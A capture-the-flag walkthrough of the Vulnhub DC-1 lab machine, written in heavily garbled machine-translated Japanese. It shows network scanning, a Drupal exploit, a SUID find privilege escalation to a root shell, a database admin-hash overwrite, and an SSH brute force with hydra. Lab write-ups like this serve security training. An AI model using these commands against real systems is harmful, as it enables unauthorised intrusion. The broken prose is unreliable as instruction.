Vulnhub範囲--DC-1

Vulnhub練習射撃レコード一度覚えておいてください

ドローンDC-1のダウンロード：

官方地址，如果觉得下载太慢可以发私信找我要
https://download.vulnhub.com/dc/DC-1.zip

レンジ5つのフラグがありますが、のは、Aを見つけてみましょう

カーリーは、LANアドレススキャン運ば使用して、ドローンを開き
、方法を

arp-scan -l

第二の方法は、
ローカルIPを参照してください

ip addr

nmap -sP 192.168.101.0/24

開いているポートを検出するために、ターゲットホストを見つけた後

nmap -A -p- 192.168.101.11

発見開いているポート80、ブラウザでページビュー情報

ツールはMetasploitの脆弱性Drupalサイトをチェックするために、既存のカーリーの使用

は比較的新しい脆弱性の成功率が高くなります使用して

、成功したシェルを取得するには、ディレクトリ構造内の現在のファイルが表示

flag1.txtを発見し、ビューにcatコマンドを使用するには、


次のステップを促しました、コンフィギュレーションファイルを表示するために
CMSの設定ファイルを見つけた後が発見された現場でのsetting.phpファイルがWebルート/デフォルトの下に
表示ファイルの情報が

FLAG2ここに発見され、データベースのユーザー名とパスワードの情報

データベースをログに記録しようとするには、

Pythonツールが見つかりました

無人機がpty.spawnによる対話型シェルを得る、2.7.3 Pythonのインストールされています（）

python -c 'import pty; pty.spawn("/bin/bash")'

アカウントのパスワードを取得するために使用する前のMySQL

mysql -udbuser -pR0ck3t

MySQLデータベースに正常に着陸、データベース名が表示


ユーザーデータテーブルを見つけ、保存されたユーザ情報の推測

管理者権限を取得するには、2つの方法があります
方法は、管理者権限を持つ新しいユーザーを取得するために抜け穴を使用して、
バージョン情報を表示します

cat /var/www/includes/bootstrap.inc | grep VERSION

Drupalのバージョン7.24
クエリの攻撃スクリプト情報

searchsploit drupal

ユーザーが攻撃の名前ADMIN1、パスワードADMIN1使用スクリプティング攻撃を追加することができます

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.101.11 -u admin1 -p admin1

データベース情報を照会

第二の方法、管理者パスワード変更
Webルートの下にスクリプトで暗号化スクリプトの場所を、サイトの場所クエリのルートは、

暗号化スクリプトを使用して、サイトのルートに切り替えるには、暗号化された暗号文を生成し、

./scripts/password-hash.sh

MySQLのに管理者パスワードを変更します

update users set pass="$S$D1mTsTyVgtvyORw3IOMad6WA5GlcWXJXFTNIzW670qs055u0/mY9" where uid=1;

クエリデータが

正常に変更します

FLAG3のコンテンツをランディングページ、見つけます

FLAG3キーワードそこパーマ、検索、-exec、影
findコマンドのクエリを使用してはSUIDの特別な権限を持っています

find / -perm -4000
find / -type f -perm -u=s 2>/dev/null

、コマンドを見つけるために右言及するfindコマンドを使用しますが見つかり
しようとして起動します

touch aaa
find ./ -name aaa -exec "whoami" \;
find ./ -name aaa -exec "/bin/sh" \;

成功は右に言及します

そのホームディレクトリに、視聴サイトルートFLAG4のユーザーが存在し発見する前に、FLAG4カタログがあるはず
ビュー


ビュールートディレクトリ構造


に成功し、すべてのフラグました
。
。
。
。
。
。
このシステムのFLAG4のユーザーが使用ヒドラのツールになりますブラストパスワード、ダウンロードジョン・暗号化スイート

wget clone http://www.openwall.com/john/j/john-1.8.0.tar.gz
tar -xvf john-1.8.0.tar.gz
cd john-1.8.0/src
make linux-x86-64

チェックの/ etc / shadowの情報

は、次のコマンドをブルートフォースを使用して

hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.101.11 -f -vV -o hydraflag4.ssh

FLAG4アカウントのパスワードを取得します

login: flag4   password: orange

あなたはログインにsshを使用することができます

あなたが動作を指示する権利を提供する場合FLAG4ブルートフォースする必要はありません、あなたは直接FLAG4情報を見ることができ、それが正しいことを言及して直接に簡単ですので、FLAG4ユーザーは、/ rootディレクトリ内のファイル情報を表示することはできません
。
Incorporatedの参照文書で

https://blog.csdn.net/weixin_43583637/article/details/101542749
https://blog.csdn.net/weixin_41038469/article/details/88409725